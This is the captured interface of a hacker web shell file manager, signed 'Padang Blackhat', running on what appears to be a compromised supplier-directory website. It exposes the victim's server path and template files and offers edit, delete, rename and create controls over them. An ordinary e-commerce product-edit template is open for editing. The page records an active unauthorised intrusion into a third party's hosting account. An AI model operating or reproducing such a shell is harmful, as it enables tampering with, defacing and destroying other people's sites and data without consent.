-
WIBUHAX0R1337
-
/
home
/
zqegovsj
/
public_html
/
us3.supplierlist.com
/
haibo
/
en
/
templates
/
newmember
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
comment_index.html
2.341KB
Edit File
Delete File
Rename
creat_excel.html
0.594KB
Edit File
Delete File
Rename
download_edit.html
2.483KB
Edit File
Delete File
Rename
flash_edit.html
3.023KB
Edit File
Delete File
Rename
flash_list.html
2.586KB
Edit File
Delete File
Rename
foot.html
2.377KB
Edit File
Delete File
Rename
freemember1.html
8.989KB
Edit File
Delete File
Rename
freemember2.html
11.075KB
Edit File
Delete File
Rename
freemember3.html
1.998KB
Edit File
Delete File
Rename
freemember4.html
14.484KB
Edit File
Delete File
Rename
head.html
11.417KB
Edit File
Delete File
Rename
home.html
6.464KB
Edit File
Delete File
Rename
member_edit.html
10.083KB
Edit File
Delete File
Rename
member_index.html
3.014KB
Edit File
Delete File
Rename
member_upload.html
2.5KB
Edit File
Delete File
Rename
menu.html
2.48KB
Edit File
Delete File
Rename
mycart_index.html
5.934KB
Edit File
Delete File
Rename
newstype_edit.html
2.915KB
Edit File
Delete File
Rename
newstype_index.html
2.097KB
Edit File
Delete File
Rename
personal.html
3.997KB
Edit File
Delete File
Rename
product_branner.html
1.613KB
Edit File
Delete File
Rename
product_edit.html
27.4KB
Edit File
Delete File
Rename
product_list.html
10.698KB
Edit File
Delete File
Rename
product_type.html
4.825KB
Edit File
Delete File
Rename
product_type_action.html
7.422KB
Edit File
Delete File
Rename
qty.html
2.855KB
Edit File
Delete File
Rename
section_list.html
2.281KB
Edit File
Delete File
Rename
sectioncontent_edit.html
8.749KB
Edit File
Delete File
Rename
sectioncontent_index.html
2.817KB
Edit File
Delete File
Rename
status.html
2.472KB
Edit File
Delete File
Rename
tip.html
1.129KB
Edit File
Delete File
Rename
update_ok.html
1.114KB
Edit File
Delete File
Rename
user_edit.html
2.771KB
Edit File
Delete File
Rename
user_index.html
4.045KB
Edit File
Delete File
Rename
<{config_load file="ua.conf" section="room"}> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <link href="<{$CSS_PATH}>css/style.css" rel="stylesheet" type="text/css"> <link href="<{$INC_PATH}>css/room.css" rel="stylesheet" type="text/css"> <SCRIPT src="<{$JS_PATH}>js/js/js/keyword.js" type=text/javascript></SCRIPT> <script src="<{$JS_PATH}>js/prototype.js"></script> <script src="<{$JS_PATH}>js/general.js"></script> <script src="<{$JS_PATH}>js/mixselect.js"></script> <script> /* Submit Once form validation- ?Dynamic Drive (www.dynamicdrive.com) For full source code, usage terms, and 100's more DHTML scripts, visit http://dynamicdrive.com */ function submitonce(theform){ //if IE 4+ or NS 6+ if (document.all||document.getElementById){ //screen thru every element in the form, and hunt down "submit" and "reset" for (I=0;I<theform.length;I++){ var tempobj=theform.elements[I] if(tempobj.type.toLowerCase()=="productmod"||tempobj.type.toLowerCase()=="reset") //disable em tempobj.disabled=true } } } </script> <SCRIPT src="<{$JS_PATH}>js/jquery.js" type=text/javascript></SCRIPT> <SCRIPT src="<{$JS_PATH}>js/formValidator.js" type=text/javascript></SCRIPT> <SCRIPT src="<{$JS_PATH}>js/formValidatorRegex.js" type=text/javascript></SCRIPT> <SCRIPT src="<{$JS_PATH}>js/catalog.js" type=text/javascript></SCRIPT> <SCRIPT src="<{$JS_PATH}>js/checkTable.js" type=text/javascript></SCRIPT> <SCRIPT src="<{$JS_PATH}>js/descCheck.js" type=text/javascript></SCRIPT> <SCRIPT src="<{$JS_PATH}>js/votablefck.js" type=text/javascript></SCRIPT> <SCRIPT language=javascript src="<{$JS_PATH}>js/common.js" type=text/javascript></SCRIPT> <SCRIPT type=text/javascript> var errorMsg1 ="Put in Keyword"; var errorMsg3 = "Put in Keyword"; </SCRIPT> <SCRIPT src="<{$JS_PATH}>js/savePos.js" type=text/javascript></SCRIPT> <SCRIPT type=text/javascript> function MM_openBrWindow(theURL,winName,features) { window.open(theURL,winName,features); } function openCatalogWindow(url,value,sword) { var opener = window.open(url+value+'&sword='+sword,"catalog") ; } function doAddSpecialChar(obj) { var url ="/script/specharen.htm" $("#pop").load(url, function () { showPopMenu("pop"); }); } function storeCur(txtarea) { if(txtarea.createTextRange) txtarea.caretPos=document.selection.createRange().duplicate(); } var lanCode=1; $(document).ready(function(){ $.formValidator.initConfig({onError:function(){return false;}}); $("#mainName").formValidator({tipid:"pnTip",onempty:"Please enter a Product Sort Name.",oncorrect:" "}).RegexValidator({regexp:"notempty",datatype:"enum",onerror:"Please enter a Product Sort Name."}).RegexValidator({regexp:"notchinese",datatype:"enum",onerror:"Please enter in English."}).InputValidator({max:160,onerror:"A Product Sort Name should be within 160 characters."}); $("#s09").formValidator({tipid:"pcTip",onempty:"Please select a category."}).RegexValidator({regexp:"notempty",datatype:"enum",onerror:"Please select a category."}); $("#prodModel").formValidator({tipid:"pmTip",empty:true}).RegexValidator({regexp:"notchinese",datatype:"enum",onerror:"Please enter in English."}).InputValidator({max:50,onerror:"Model No. should be within 50 characters."}); $("#prodStandard").formValidator({tipid:"psTip",empty:true}).RegexValidator({regexp:"notchinese",datatype:"enum",onerror:"Please enter in English."}).InputValidator({max:50,onerror:"Standard should be within 50 characters."}); $("#o11").formValidator({tipid:"pdTip",onempty:"Please enter product description in English.",oncorrect:" "}).InputValidator({max:4000,onerror:"Product description should be within 4,000 characters."}).RegexValidator({regexp:"notempty",datatype:"enum",onerror:"Please enter product description in English."}); $("#prodPhoto").formValidator({tipid:"ppTip",empty:true}).RegexValidator({regexp:"picture",datatype:"enum",onerror:"jpg, jpeg or gif only."}); $("#prodTrademark").formValidator({tipid:"ptTip",empty:true}).RegexValidator({regexp:"notchinese",datatype:"enum",onerror:"Please enter in English."}).InputValidator({max:50,onerror:"Trademark should be within 50 characters."}); $("#prodProductivity").formValidator({tipid:"ppyTip",empty:true}).RegexValidator({regexp:"notchinese",datatype:"enum",onerror:"Please enter in English."}).InputValidator({max:50,onerror:"Productivity should be within 50 characters."}); $("#prodPrice").formValidator({tipid:"ppiceTip",empty:true}).RegexValidator({regexp:"notchinese",datatype:"enum",onerror:"Please enter in English."}).InputValidator({max:50,onerror:"Price should be within 50 characters."}); $("#h01").formValidator({tipid:"hcTip",empty:true}).RegexValidator({regexp:"intege1",datatype:"enum",onerror:"Please enter in numbers."}); $("#prodOrigin").formValidator({tipid:"poTip",empty:true}).RegexValidator({regexp:"notchinese",datatype:"enum",onerror:"Please enter in English."}).InputValidator({max:50,onerror:"Origin should be within 50 characters."}); $("#prodPacking").formValidator({tipid:"ppackTip",empty:true}).RegexValidator({regexp:"notchinese",datatype:"enum",onerror:"Please enter in English."}).InputValidator({max:50,onerror:"Packing should be within 50 characters."}); $("#prodMinOrder").formValidator({tipid:"pmoTip",empty:true}).RegexValidator({regexp:"notchinese",datatype:"enum",onerror:"Please enter in English."}).InputValidator({max:50,onerror:"Minimum order should be within 50 characters."}); $("#prodTransportation").formValidator({tipid:"ptpTip",empty:true}).RegexValidator({regexp:"notchinese",datatype:"enum",onerror:"Please enter in English."}).InputValidator({max:50,onerror:"Shipping term should be within 50 characters."}); $("#prodUrl").formValidator({tipid:"puTip",empty:true}).RegexValidator({regexp:"url",datatype:"enum",onerror:"Please enter a right URL."}).InputValidator({max:200,onerror:"Website should be within 200 characters."}); $("input[name=prodKeyword]").each(function(){ $('#'+this.id).formValidator({tipid:"wordTip",oncorrect:" "}).FunctionValidator({fun:checkkeyWord}).InputValidator({max:40,onerror:"product keyword should be within 40 characters."}); }); $('#wordTable').keyword({ tooLongErrMsg:'product keyword should be within 40 characters.', keywordName: 'prodKeyword', customUrl:'/product.do?xcase=suggest' }); }); </SCRIPT> <script type="text/javascript" > /****添加新条目***/ /******点击添加input输入框JS******/ function checkRowsLimit() { var rowLimit = 17; var len=document.getElementById('filearea').rows.length; if(len==rowLimit) { alert('Sorry, to add more than the upper limit.'); return false; } else { return true; } } function addNewRow() { i=sectionaddfrm.hid.value; i++; sectionaddfrm.hid.value=i; var obj=document.getElementById('filearea'); var row=obj.insertRow(-1); var c0=row.insertCell(0); c0.innerHTML=''; c0.align='left'; var c1=row.insertCell(1); c1.innerHTML=' <td></td><input type=text maxlength=40 name="prodKeyword['+sectionaddfrm.hid.value+']" style="margin-left:1px;" value="" onpropertychange=changeFlagValue()/>'; c1.align='left'; var c2=row.insertCell(2); c2.innerHTML='<a href="javascript:void(0)" onclick="removeRow(this)">[ Delete ]</a>'; changeFlag = true; try { comm_set_page_height(); } catch (e) { } } function removeRow(fontobj) { if(confirm("Are you sure to delete?")) { var obj=document.getElementById('filearea'); var n=fontobj.parentNode.parentNode.rowIndex; obj.deleteRow(n); } } </script> <table width="100%" border="0" cellspacing="0" cellpadding="10"> <tr bgcolor="#FFFFFF"> <td> <form name="sectionaddfrm" id="sectionaddfrm" method="post" action="<{$smarty.env.PHP_SELF}>" enctype="multipart/form-data"> <input type="hidden" name="id" value="<{$smarty.get.id}>"> <input type="hidden" name="hid" id="hid" value="3"/> <input type="hidden" name="oldimgname" value="<{$ProductInfo.ProductPicture}>"> <table width="100%" border="0" cellpadding="2" cellspacing="1" bgcolor="#D3E2E7" class="en-2"> <tr bgcolor="#D3E2E7"> <td colspan="2" class="link-black"> Product Information </td> </tr> <tr bgcolor="#FFFFFF" width="100%"> <td width="15%"><font color="#FF6600">*</font> Name:</td> <td ><{$ProductInfo.ProductName|default:$smarty.get.keyword}> </td> </tr> <tr bgcolor="#FFFFFF"> <td ><font color="#FF6600">*</font> Model No:</td> <td > <{$ProductInfo.ProductSn}> </td> </tr> <tr bgcolor="#FFFFFF"> <td ><font color="#FF6600">*</font> Description:</td> <td > <{$ProductInfo.ProductContent}> <input type="hidden" name="hiddenField" id="hiddenField" /></td> </tr> <tr bgcolor="#FFFFFF"> <td ><font color="#FF6600"> </font>Categories:</td> <td ><font color="#666666"> <span class="zi"> <br> <select name="product_type"> <option value="0">Please select Category</option> <{foreach from=$ProductTypes name=typeselect item=types}> <option value="<{$types.ID}>" <{if $ProductInfo.ProductProducttypeId==$types.ID}>selected<{/if}>><{if $types.Level==0}><strong><strong><strong><{$types.Name}></strong></strong></strong><{else}> |-<{$types.Name}><{/if}></option> <{/foreach}> </select> </span> <br> (<span class="zi"><font color="#666666">Can you create the Product in accordance with the classification series for you Manage )</font></span></font></td> </tr> <tr bgcolor="#FFFFFF"> <td valign="middle" ><font color="#FF6600"> </font>Keywords:<{if $smarty.get.id!=null}>(DelectKeywords,SaveDelete)<{/if}></td> <td ><{if $smarty.get.id!=null}><br> <{foreach from=$keywords name=keywords item=ks}> <{$ks.name}><br><{/foreach}> <{/if}> <DIV class=suggestdivBox><A class=fr style="DISPLAY: none" href="javascript:void(0)"><IMG alt=close src="../../haibo/en/images/close_r.gif"></A> </DIV></td> </tr> <tr bgcolor="#FFFFFF"> <td valign="middle" > </td> <td ><img id="uploadpic" src="<{if $ProductInfo.ProductPicture!=""}><{$imgpath}>upload/big/<{$ProductInfo.ProductPicture}><{else}><{$smarty.const.URL}>../../haibo/en/media/default/big.jpg<{/if}>" alt="<{$ProductInfo.prod_name|default:"English"}>" width="<{#PictureMaxWidth#}>" height="<{#PictureMaxHeight#}>" border="0" /></td> </tr> <tr bgcolor="#FFFFFF"> <td valign="middle" >More Photos </td> <td > <table width="100%" border="0" cellpadding="2" cellspacing="1" bgcolor="#D3E2E7" class="en-2"> <tr bgcolor="#FFFFFF" class="header" align="center"> <td><strong>Picture Preview</strong></td> <td><strong>Name</strong></td> <td><strong>Picture Description</strong></td> </tr> <{if $imglist!=null}> <{foreach item=imglist from=$imglist name=img_list}> <tr bgcolor="#FFFFFF" align="center"> <td> <a href="<{$imgpath}>upload/big/<{$imglist.img}>"> <img src="<{$imgpath}>upload/small/<{$imglist.img}>" /></a> </td><td> <{$imglist.title}> </td><td> <{$imglist.des}> </td> </tr> <{foreachelse}> <tr bgcolor="#FFFFFF"> <td colspan="4" align="center"><strong><{#NotAnyDatas#}></strong></td> </tr> <{/foreach}><{else}><tr bgcolor="#FFFFFF"> <td colspan="4" align="center"><strong><{#NotAnyDatas#}></strong></td> </tr><{/if}> <tr bgcolor="#FFFFFF" align="center"> <{if $s!=null}> <td colspan="4"></td> <{elseif $p!=null}> <td colspan="4"> </td><{else}> <{/if}> </tr> </table> </td> </tr> <tr bgcolor="#FFFFFF"><td></td> <td height="40"><input type="hidden" name="action" value="product_edit"> <input name="save" type="button" onclick="javascript:history.go(-1)" id="save" value=" back "> </td> </tr> </table> </form> </td> </tr> </table> <SCRIPT type=text/javascript> //<![CDATA[ var bannerScriptURI = 'http://www.made-in-china.com/ajaxfunction.do?xcase=getBannerContent'; if(!!window.jQuery){ jQuery.getScript(bannerScriptURI, function(){ if(window.bannerHTML&&document.getElementById("banner")) document.getElementById("banner").innerHTML = bannerHTML.replace(/="\//gi,'="http://www.made-in-china.com/').replace(/url=\//gi,'url=http://www.made-in-china.com/'); }); } else{ var timerMax = 0; var timer = setInterval(function(){ if(window.bannerHTML&&document.getElementById("banner")){ document.getElementById("banner").innerHTML = bannerHTML.replace(/="\//gi,'="http://www.made-in-china.com/').replace(/url=\//gi,'url=http://www.made-in-china.com/'); clearInterval(timer); } timerMax+=100; if(timerMax > 1700){ clearInterval(timer); } }, 100); var bannerContent =document.createElement("script"); bannerContent.setAttribute("type", "text/javascript"); bannerContent.setAttribute("src", bannerScriptURI); document.getElementsByTagName("head").item(0).appendChild(bannerContent); } //]]> </SCRIPT> <SCRIPT src="<{$JS_PATH}>js/objectSwap.js" type=text/javascript></SCRIPT> <script type="text/javascript"> function hideorshow(curDiv){ curDiv.style.display = (curDiv.style.display == 'block')? 'none':'block'; }</SCRIPT> <script language=javascript> function showsubmenu(sid) { whichEl = eval("submenu" + sid); if (whichEl.style.display == "none") { eval("submenu" + sid + ".style.display=\"\";"); eval('img' + sid + '.src = "images/menu_reduce.gif"'); } else { eval("submenu" + sid + ".style.display=\"none\";"); eval('img' + sid + '.src = "images/plus.gif"'); } } </script> <script language="javascript"> var linkage = new Linkage("dataSrc", "<{$JS_PATH}>media/xml/industry_option.xml"); linkage.BLANK_SELECT = "Please select "; linkage.init(); </script><{include file="newmember/foot.html"}>
Save!!!
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat